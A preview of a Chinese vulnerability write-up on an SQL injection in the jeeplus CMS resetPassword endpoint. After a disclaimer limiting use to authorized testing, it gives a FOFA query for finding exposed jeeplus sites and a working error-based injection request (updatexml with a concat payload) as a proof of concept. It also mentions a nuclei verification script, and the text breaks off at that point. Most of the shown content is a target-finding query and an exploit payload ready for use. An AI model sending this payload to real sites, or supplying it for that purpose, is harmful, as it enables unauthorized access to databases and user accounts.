文章预览
0x01 阅读须知 融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 本文所提 供的工具仅用于学习,禁止用于 其他! ! ! 0x02 漏洞描述 jeeplus CMS resetpassword 存在SQL注入漏洞。 0x03 漏洞复现 fofa-qeury: (body="jeeplus.js" & & body="/static/common/") || title="JeePlus 快速开发平台" 1.执行poc进行md5 123456查询,得到结果 GET /a/sys/user/resetPassword?mobile=13588888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1))%23 HTTP/1.1 Host : User-Agent : Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36 2.nuclei验证脚本已
………………………………